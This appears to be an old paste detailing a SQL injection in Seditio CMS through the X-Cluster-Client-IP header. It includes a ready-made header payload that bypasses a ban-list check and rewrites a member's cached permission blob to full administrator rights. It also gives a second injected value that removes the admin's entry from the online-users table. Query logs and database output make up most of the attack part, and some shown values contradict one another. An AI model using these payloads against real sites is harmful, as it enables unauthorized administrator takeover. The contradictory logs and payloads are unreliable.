
Seditio CMS — SQL injection via the X-Cluster-Client-IP header (cluster mode only), leading to privilege escalation and forced logout of other users

a guest May 21st, 2013 143 Never
  1. Precondition: $cfg['clustermode'] must be enabled (admin panel checkbox "cluster mode" = YES, i.e. the value is true). With the default (false) the line below uses REMOTE_ADDR and the header is never read, so nothing that follows is reachable.
  2.  
  3. $usr['ip'] = ($cfg['clustermode']) ? $_SERVER['HTTP_X_CLUSTER_CLIENT_IP'] : $_SERVER['REMOTE_ADDR'] ;
  4.  
  5. The header value is neither validated as an IP address nor escaped: whatever the client sends in X-Cluster-Client-IP becomes $usr['ip'] verbatim (REMOTE_ADDR, by contrast, is set by the web server and cannot be spoofed this way).
  6.  
  7. Consequence: SQL injection in every statement that concatenates $usr['ip'], for example the last-IP update:
  8.  
  9.                 sed_sql_query("UPDATE $db_users SET user_lastip='".$usr['ip']."' WHERE user_id='".$row['user_id']."' LIMIT 1");
  10.  
  11.  
  12. Request to the authentication page with the crafted header:
  13.  
  14. X-CLUSTER-CLIENT-IP: 127.0.0.1' or 1='1
  15.  
  16. QUERY SNIP____
  17.  
  18. MariaDB [sed]> UPDATE sed_users SET user_lastip='127.0.0.1' or 1=1 WHERE user_id=1;
  19.                 /* No error is returned (blind injection): the SET expression '127.0.0.1' or 1=1 evaluates to the boolean 1, so user_lastip of user_id=1 is overwritten with "1", as the SELECT below confirms. */
  20. +-------------+-----------+
  21. | user_lastip | user_name |
  22. +-------------+-----------+
  23. |  1           | admin     |
  24. +-------------+-----------+
  25. 1 row in set (0.00 sec)
  26.  
  27.  
  28. MariaDB [sed]> select user_lastip,user_name from sed_users;
  29.  
  30. +-------------+-----------+
  31. | user_lastip | user_name |
  32. +-------------+-----------+
  33. | 1           | admin     |
  34. +-------------+-----------+
  35. 1 row in set (0.00 sec)
  36.  
  37. Second vector — the injected text can be any SQL expression (the payload itself is not shown here; the stored value looks like the output of a function such as version(), cut to the width of the user_lastip column):
  38.  
  39. MariaDB [sed]> select user_lastip,user_name from sed_users where user_id=1;
  40. +------------------+-----------+
  41. | user_lastip      | user_name |
  42. +------------------+-----------+
  43. | 5.5.30-MariaDB-m | admin     |
  44. +------------------+-----------+
  45. 1 row in set (0.00 sec)
  46.  
  47.  
  48. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  49. Privilege escalation
  50.  
  51.  
  52. MariaDB [sed]> select * from sed_auth where auth_code='admin';
  53. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  54. | auth_id | auth_groupid | auth_code | auth_option | auth_rights | auth_rights_lock | auth_setbyuserid |
  55. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  56. |       1 |            1 | admin     | a           |           0 |              255 |                1 |
  57. |       2 |            2 | admin     | a           |           0 |              255 |                1 |
  58. |       3 |            3 | admin     | a           |           0 |              255 |                1 |
  59. |       4 |            4 | admin     | a           |           0 |              255 |                1 |
  60. |       5 |            5 | admin     | a           |         255 |              255 |                1 |
  61. |      76 |            6 | admin     | a           |           1 |                0 |                1 |
  62. +---------+--------------+-----------+-------------+-------------+------------------+------------------+
  63.  
  64. 6 rows in set (0.01 sec) — one sed_auth row per group for the "admin" auth code; auth_rights is the permission bitmask.
  65.  
  66.  
  67. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin';
  68. +--------------+-------------+
  69. | auth_groupid | auth_rights |
  70. +--------------+-------------+
  71. |            1 |           0 |
  72. |            2 |           0 |
  73. |            3 |           0 |
  74. |            4 |           0 |
  75. |            5 |         255 |
  76. |            6 |           1 |
  77. +--------------+-------------+
  78. 6 rows in set (0.20 sec)
  79.  
  80.  
  81. auth_groupid 5 is the administrators group (see the sed_groups listing below).
  82.  
  83.  
  84. administrators: auth_rights = 255, i.e. every permission bit set — this is what unlocks the admin panel.
  85.  
  86.  
  87. MariaDB [sed]> select grp_id,grp_alias from sed_groups;
  88. +--------+----------------+
  89. | grp_id | grp_alias      |
  90. +--------+----------------+
  91. |      1 | guests         |
  92. |      2 | inactive       |
  93. |      3 | banned         |
  94. |      4 | members        |
  95. |      5 | administrators |
  96. |      6 | moderators     |
  97. +--------+----------------+
  98. 6 rows in set (0.02 sec)
  99.  
  100.  
  101. For a member (maingrp 4) the grid that sed_auth_build() returns — and that serialize() then stores in sed_users.user_auth — looks like this:
  102.  
  103. /*
  104. a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  105.  
  106.  
  107. members: "admin";a:1:{s:1:"a";i:0;}
  108.  
  109. key "admin", option "a" => int 0: a member has no admin rights, which matches the sed_auth row for auth_groupid 4:
  110.  
  111.  
  112. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=4;
  113. +--------------+-------------+
  114. | auth_groupid | auth_rights |
  115. +--------------+-------------+
  116. |            4 |           0 |
  117. +--------------+-------------+
  118.  
  119. */
  120.  
// First login with no cached grid: the per-user rights grid is built from
// sed_auth for the user's groups and queued (as a SQL fragment appended to the
// login UPDATE) to be stored in sed_users.user_auth. Later authenticated
// requests unserialize that cached blob instead of recomputing it, so the blob
// is the effective ACL for the user.
if (empty($row['user_auth']))
	{
	$usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
	$sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
	}
  126.  
  127.  
  128.  
  129. For an administrator (maingrp 5) the same request produces the grid below:
  130. (every option is 255)
  131.  
  132. /* output result
  133.                 a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:255;}s:6:"forums";a:2:{i:1;i:255;i:2;i:255;}s:7:"gallery";a:1:{s:1:"a";i:255;}s:5:"index";a:1:{s:1:"a";i:255;}s:7:"message";a:1:{s:1:"a";i:255;}s:4:"page";a:4:{s:8:"articles";i:255;s:4:"news";i:255;s:7:"sample1";i:255;s:7:"sample2";i:255;}s:3:"pfs";a:1:{s:1:"a";i:255;}s:4:"plug";a:13:{s:7:"adminqv";i:255;s:7:"cleaner";i:255;s:7:"contact";i:255;s:14:"massmovetopics";i:255;s:4:"news";i:255;s:11:"passrecover";i:255;s:11:"recentitems";i:255;s:6:"search";i:255;s:10:"skineditor";i:255;s:10:"statistics";i:255;s:8:"syscheck";i:255;s:7:"tinymce";i:255;s:10:"whosonline";i:255;}s:2:"pm";a:1:{s:1:"a";i:255;}s:5:"polls";a:1:{s:1:"a";i:255;}s:7:"ratings";a:1:{s:1:"a";i:255;}s:5:"users";a:1:{s:1:"a";i:255;}}
  134.  
  135.  
  136.  
  137. +++++++++++++++++++++++++++++++++++
  138. admin: "admin";a:1:{s:1:"a";i:255;}
  139.  
  140. key "admin", option "a" => int 255: full administrator rights, matching the sed_auth row for auth_groupid 5:
  141.  
  142. MariaDB [sed]> select auth_groupid,auth_rights from sed_auth where auth_code='admin' and auth_groupid=5;
  143. +--------------+-------------+
  144. | auth_groupid | auth_rights |
  145. +--------------+-------------+
  146. |            5 |         255 |
  147. +--------------+-------------+
  148.  
  149.  
  150. */
  151.  
  152.  
  153. =========================================================
  154.  
  155. function sed_auth_build($userid, $maingrp=0)
  156.         {
  157.         global $db_auth, $db_groups_users;
  158.  
  159.         $groups = array();
  160.         $authgrid = array();
  161.         $tmpgrid = array();
  162.  
  163.         if ($userid==0 || $maingrp==0)
  164.                 {
  165.                 $groups[] = 1;
  166.                 }
  167.         else
  168.                 {
  169.                 $groups[] = $maingrp;
  170.                 $sql = sed_sql_query("SELECT gru_groupid FROM $db_groups_users WHERE gru_userid='$userid'");
  171.  
  172.                 while ($row = sed_sql_fetchassoc($sql))
  173.                            { $groups[] = $row['gru_groupid']; }
  174.                 }
  175.  
  176.     $sql_groups = implode(',', $groups);
  177.         $sql = sed_sql_query("SELECT auth_code, auth_option, auth_rights FROM $db_auth WHERE auth_groupid IN (".$sql_groups.") ORDER BY auth_code ASC, auth_option ASC");
  178.  
  179.         while ($row = sed_sql_fetchassoc($sql))
  180.             { $authgrid[$row['auth_code']][$row['auth_option']] |= $row['auth_rights']; }
  181.  
  182.         return($authgrid);      }
  183.  
  184. The login path then persists the grid with this UPDATE — note that $usr['ip'] (header-controlled in cluster mode) is concatenated into the same statement, just before the user_auth fragment:
  185.  
  186.  
  187.                         $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
  188.  
  189.  
  190. How the rights are evaluated: when a user is authenticated from session/cookie, the grid is read back from sed_users.user_auth and unserialized; the admin check is then just a lookup of ['admin']['a'] — nothing is recomputed from sed_auth.
  191.  
// Illustration of the check: the grid comes straight out of the user row and is
// trusted as-is (255 = full admin rights, 0 = none). Whoever can write
// sed_users.user_auth therefore decides the outcome. (In the real auth path
// $usr['auth'] is already the unserialized array; here the raw blob is shown.)
$di=unserialize($usr['auth']);
	echo $di['admin']['a']; // prints 255 for the patched account, and the admin-panel check passes
  194.  
  195.  
  196. Privilege escalation — exploitation
  197.  
  198. Obstacle: before the login UPDATE runs, the ban-list check splits $usr['ip'] on "." and builds an IN(...) list from the first four pieces, so a payload has to survive that query without a syntax error:
  199.  
// Ban-list pre-check. The raw $usr['ip'] is split on "." and only elements
// 0..3 are re-assembled into an IN(...) list of exact and wildcard masks
// (a.b.c.d, a.b.c.*, a.b.*.*, a.*.*.*). A payload sitting in one of those four
// elements therefore breaks this query before the login UPDATE is reached.
// NOTE: fewer than four segments leaves $userip[3] undefined (PHP notice).
$usr['ip']="127.0.0.1'or 1=1--";   // example payload under test
$userip = explode('.', $usr['ip']);
$ipmasks = "('".$userip[0].".".$userip[1].".".$userip[2].".".$userip[3]."','".$userip[0].".".$userip[1].".".$userip[2].".*','".$userip[0].".".$userip[1].".*.*','".$userip[0].".*.*.*')";
var_dump($userip);
  204.  
  205. With the four-part value 127.0.0.1'or 1=1-- the fourth element is 1'or 1=1--, so:
  206.  
  207. echo $usrip[3]; //output result
  208.  
  209. IN(127.0.0.1') or usr_auth='blah'-- -)
  210. → syntax error: the quote and the trailing comment land inside the IN(...) list, and "-- -" also comments out its closing parenthesis.
  211.  
  212.         And the second statement (the UPDATE) is equally broken:
  213.  
  214. 130516 21:25:52    66 Query     UPDATE sed_users SET user_lastlog='1368721491', user_lastip='12.3.44.4.4') or usr_auth='blah' -- -
  215.  
  216. Also invalid: the ")" that was meant to close IN(...) now appears inside the SET clause.
  217.  
  218.  
  220. Workaround: add a fifth dot-separated segment.
  220.  
// Five dot-separated segments: explode() yields $userip[4] = "4'or 1=1-- -",
// which $ipmasks never reads, so the ban-list query stays syntactically valid
// while the unsplit string (payload included) still reaches the login UPDATE.
$usr['ip']="127.0.0.1.4'or 1=1-- -";
	var_dump($usr['ip']); // dumps the whole string; the payload is carried in the 5th segment
  223.  
  224.         $userip[4] is never used by $ipmasks, so the ban-list query stays valid, while the unsplit $usr['ip'] (payload included) is still what the later UPDATE concatenates.
  225.  
  226. Test account: a member-level user named "administrator" (user_id 3 in the queries below). Its cached grid before the attack:
  227.           MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G
  228. *************************** 1. row ***************************
  229. user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:0;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  230. 1 row in set (0.44 sec)
  231.  
  232. admin option "a" => 0: no admin rights.
  233.         Goal: rewrite that cached blob through the SQL injection so the same account gets 255 (privilege escalation).
  234.  
  235. Case 1 — the session/cookie authentication path:
  236.  
  237. if ($cfg['authmode']==2 || $cfg['authmode']==3)
  238.         { session_start(); }
  239.  
  240. if (isset($_SESSION['rsedition']) && ($cfg['authmode']==2 || $cfg['authmode']==3))
  241.         {
  242.         $rsedition = $_SESSION['rsedition'];
  243.         $rseditiop = $_SESSION['rseditiop'];
  244.         $rseditios = $_SESSION['rseditios'];
  245.         }
  246. elseif (isset($_COOKIE['SEDITIO']) && ($cfg['authmode']==1 || $cfg['authmode']==3))
  247.         {
  248.         $u = base64_decode($_COOKIE['SEDITIO']);
  249.         $u = explode(':_:',$u);
  250.         $rsedition = sed_import($u[0],'D','INT');
  251.         $rseditiop = sed_import($u[1],'D','H32');
  252.         $rseditios = sed_import($u[2],'D','ALP');
  253.         }
  254.  
  255. if ($rsedition>0 && $cfg['authmode']>0)
  256.         {
  257.         if (mb_strlen($rseditiop)!=32)
  258.                 { sed_diefatal('Wrong value for the password.'); }
  259.  
  260.         if ($cfg['ipcheck'])
  261.                 { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
  262.         else
  263.                 { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
  264.  
  265.         if ($row = sed_sql_fetcharray($sql))
  266.                 {
  267.                 if ($row['user_maingrp']>3)
  268.                         {
  269.                         $usr['id'] = $row['user_id'];
  270.                         $usr['sessionid'] = ($cfg['authmode']==1) ? md5($row['user_lastvisit']) : session_id();
  271.                         $usr['name'] = $row['user_name'];
  272.                         $usr['maingrp'] = $row['user_maingrp'];
  273.                         $usr['lastvisit'] = $row['user_lastvisit'];
  274.                         $usr['lastlog'] = $row['user_lastlog'];
  275.                         $usr['timezone'] = $row['user_timezone'];
  276.                         $usr['skin'] = ($cfg['forcedefaultskin']) ? $cfg['defaultskin'] : $row['user_skin'];
  277.                         $usr['lang'] = ($cfg['forcedefaultlang']) ? $cfg['defaultlang'] : $row['user_lang'];
  278.                         $usr['newpm'] = $row['user_newpm'];
  279.                         $usr['auth'] = unserialize($row['user_auth']);
  280.                         $usr['level'] = $sed_groups[$usr['maingrp']]['level'];
  281.                         $usr['profile'] = $row;
  282.  
  283.                         if ($usr['lastlog']+$cfg['timedout'] < $sys['now_offset'])
  284.                                 {
  285.                                 $sys['comingback']= TRUE;
  286.                                 $usr['lastvisit'] = $usr['lastlog'];
  287.                                 $sys['sql_update_lastvisit'] = ", user_lastvisit='".$usr['lastvisit']."'";
  288.                                 }
  289.  
  290.                         if (empty($row['user_auth']))
  291.                                 {
  292.                                 $usr['auth'] = sed_auth_build($usr['id'], $usr['maingrp']);
  293.                                 $sys['sql_update_auth'] = ", user_auth='".serialize($usr['auth'])."'";
  294.                                 }
  295.  
  296.                 //      $sql = sed_sql_query("UPDATE $db_users SET user_lastlog='".$sys['now_offset']."', user_lastip='".$usr['ip']."', user_sid='".$usr['sessionid']."', user_logcount=user_logcount+1 ".$sys['sql_update_lastvisit']." ".$sys['sql_update_auth']." WHERE user_id='".$usr['id']."'");
  297.                         }
  298.                 }
  299.         }
  300.  
  301.  
  302. Sending only a PHP session cookie:
  303.  
  304. Cookie: PHPSESSID=<session id whose $_SESSION['rsedition'] is set, with authmode 2 or 3>
  305.  
  306.         the outer guard (if ($rsedition>0 && $cfg['authmode']>0)) is true and the lookup below runs:
  307.  
  308. if ($rsedition>0 && $cfg['authmode']>0)
  309.         {
  310.         if (mb_strlen($rseditiop)!=32)
  311.                 { sed_diefatal('Wrong value for the password.'); }
  312.  
  313.         if ($cfg['ipcheck'])
  314.                 { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'"); }
  315.         else
  316.                 { $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop'"); }
  317.  
  318.  
  319. file: config.php
  320. section: $cfg['ipcheck']=true;
  321.  
  322.         With ipcheck on, user_lastip — i.e. the unescaped $usr['ip'] — becomes part of the SELECT:
  323.  
  324. $sql = sed_sql_query("SELECT * FROM $db_users WHERE user_id='$rsedition' AND user_password='$rseditiop' AND user_lastip='".$usr['ip']."'");
  325.  
  326.         The SET-style payload does not fit a SELECT, so here it is only a syntax error:
  327.  
  328. 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  329.  
  330.  
  331.         full snip query
  332.  
  333. +++++++++++++++++++++++++++++++++++++
  334. SELECT * FROM $db_users WHERE user_id='3' AND user_password='blah' AND user_lastip='127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -'
  335.  
  336.         Fails: ",column=value" and a second WHERE are not valid inside a SELECT's WHERE clause, so the cookie path is not a usable sink.
  337.  
  338.         Case 2 — send the payload on the login-page request instead, where $usr['ip'] reaches the login UPDATE:
  339. X-CLUSTER-CLIENT-IP: 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  340.  
  341. http://s18.postimg.org/xcjy55mkp/fullquery.png
  342.  
  343.  
  344. (On that request no login cookie/session exists yet, so the cookie-path guard is false and the SELECT above never runs:)
  345.  
  346. /*
  347. if ($rsedition>0 && $cfg['authmode']>0) // false on the login request: no session/cookie yet, so only the login-path statements run
  348. */
  349.  
  350.  
  351. MySQL general query log for the login request. The payload rewrites the last-IP UPDATE: it sets user_auth of user_id 3 and the original "WHERE user_id='1' LIMIT 1" is commented out by "-- -". The same string also lands in the sed_online DELETE, which is then malformed and simply fails:
  352.  
  353.                   326 Query     SELECT user_id, user_maingrp, user_banexpire, user_skin, user_lang FROM sed_users WHERE user_password='3e1f0522ece29f7be6f69cd3bfb2d9a8' AND user_name='admin'
  354.                   326 Query     UPDATE sed_users SET user_lastip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' WHERE user_id='1' LIMIT 1
  355.                   326 Query     DELETE FROM sed_online WHERE online_userid='-1' AND online_ip='127.0.0.1.4',user_auth='getsikdir!!!!!!!!!!!!!!!!!!' WHERE user_id=3 -- -' LIMIT 1
  356. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  357.  
  358. AFTER
  359.  
  360. Full exploiting payload
  361.  
  362. 127.0.0.1.4',user_auth=replace(user_auth,'admin";a:1:{s:1:"a";i:0;}','admin";a:1:{s:1:"a";i:255;}') WHERE user_id=3 -- -
  363.  
  364. MariaDB [sed]> select user_auth from sed_users where user_name='administrator'\G*************************** 1. row ***************************
  365. user_auth: a:13:{s:5:"admin";a:1:{s:1:"a";i:255;}s:8:"comments";a:1:{s:1:"a";i:3;}s:6:"forums";a:2:{i:1;i:3;i:2;i:3;}s:7:"gallery";a:1:{s:1:"a";i:1;}s:5:"index";a:1:{s:1:"a";i:1;}s:7:"message";a:1:{s:1:"a";i:1;}s:4:"page";a:4:{s:8:"articles";i:3;s:4:"news";i:3;s:7:"sample1";i:3;s:7:"sample2";i:3;}s:3:"pfs";a:1:{s:1:"a";i:3;}s:4:"plug";a:13:{s:7:"adminqv";i:1;s:7:"cleaner";i:1;s:7:"contact";i:3;s:14:"massmovetopics";i:0;s:4:"news";i:1;s:11:"passrecover";i:1;s:11:"recentitems";i:1;s:6:"search";i:1;s:10:"skineditor";i:3;s:10:"statistics";i:1;s:8:"syscheck";i:3;s:7:"tinymce";i:1;s:10:"whosonline";i:1;}s:2:"pm";a:1:{s:1:"a";i:3;}s:5:"polls";a:1:{s:1:"a";i:3;}s:7:"ratings";a:1:{s:1:"a";i:3;}s:5:"users";a:1:{s:1:"a";i:3;}}
  366. 1 row in set (0.00 sec)
  367.  
  368. "admin";a:1:{s:1:"a";i:255;}
  369.  
  370. The cached grid now says admin option "a" = 255 — the injected replace() swapped the 0 for 255 without touching any other key.
  371.  
  372. The next authenticated request for user 3 unserializes the modified blob, the admin check passes, and the admin panel opens:
  373.  
  374. http://s22.postimg.org/whujo6xu9/lol.png
  375.  
  376.  
  377. ==============================================================
  378.  
  379. Forced logout of other users (same header, different sink)
  380.  
  381. MariaDB [sed]> select online_ip,online_name from sed_online;
  382. +-----------+-------------+
  383. | online_ip | online_name |
  384. +-----------+-------------+
  385. | 127.0.0.1 | admin       |
  386. | 128.0.0.2 | user        |
  387. +-----------+-------------+
  388. 2 row in set (0.00 sec)
  389.  
  390. Logged in as "user"; the logout request carries the admin's address (as listed in sed_online) in the header:
  391.  
  392. Logout page request header → logout.php
  393.  
  394. X-CLUSTER-CLIENT-IP: 127.0.0.1
  395.  
  396. if ($usr['id']>0)
  397.         {
  398.         $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='".$usr['ip']."'");
  399.         sed_redirect("message.php?msg=".$usr['ip']);
  400.         exit;
  401.         }
  402.  
  403. $usr['ip'] now holds 127.0.0.1222233' or online_name='admin' (the spoofed header; the address part only has to differ from the attacker's real one), so the DELETE becomes:
  404.  
  405. QUERY EXEC - >  $sql = sed_sql_query("DELETE FROM $db_online WHERE online_ip='127.0.0.1222233' or online_name='admin'");
  406.  
  407. Effect: the admin's sed_online row is removed. Even without the injection, a plainly spoofed header deletes every online row for that address, because the statement keys on online_ip rather than on the logging-out user's id. Whether this actually ends the admin's session or only the who's-online entry depends on how sed_online is used elsewhere, which is not shown here.
  408.  
  409.  
  410. my favorit :) http://www.youtube.com/watch?v=ruFt9ZvBnvo